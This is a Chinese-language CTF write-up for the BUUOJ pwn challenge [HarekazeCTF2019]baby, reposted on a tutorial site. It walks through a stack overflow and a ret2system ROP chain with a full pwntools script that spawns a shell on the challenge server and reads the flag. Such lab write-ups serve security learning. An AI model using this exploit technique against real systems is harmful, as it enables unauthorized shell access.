栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

PWN——Buuoj [HarekazeCTF2019]baby

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

PWN——Buuoj [HarekazeCTF2019]baby

先用IDA64打开,发现scanf看一眼存入数据的位置

熟悉的味道

按一下shift f12

system函数和/bin/sh都给了那就不客气了

困难题我唯唯诺诺,简单题我重拳出击

思路明确,现在还需要pop rdi,ret来传一下参数(str“/bin/sh)到system里

这个时候用到了ROPgadget

里面的babyrop是这道题的文件名,其他题换一下就ok

现在找到了地址,准备工作完成,敲python

有一点需要注意的是,咱们明明找的是400683,搁ida里咋面目全非

 其实是这块翻译串了,如果把这里的二进制拿出来,从中间开始读,也就是400683,再翻译过来就成了pop rdi,ret了,不用太在意

python代码

from pwn import*

r=remote('node4.buuoj.cn',27198)

shell=0x601048
system=0x400496
rdi=0x400683

payload=b'a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)

r.sendline(payload)
r.interactive()

本以为可以直接cat flag了,但是却显示找不到,这里输入find -iname 'flag'

把地址复制下来,再运行一次

输入:cat 地址

flag出来了

今天任务搞定      无限火力真好玩   

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/715499.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号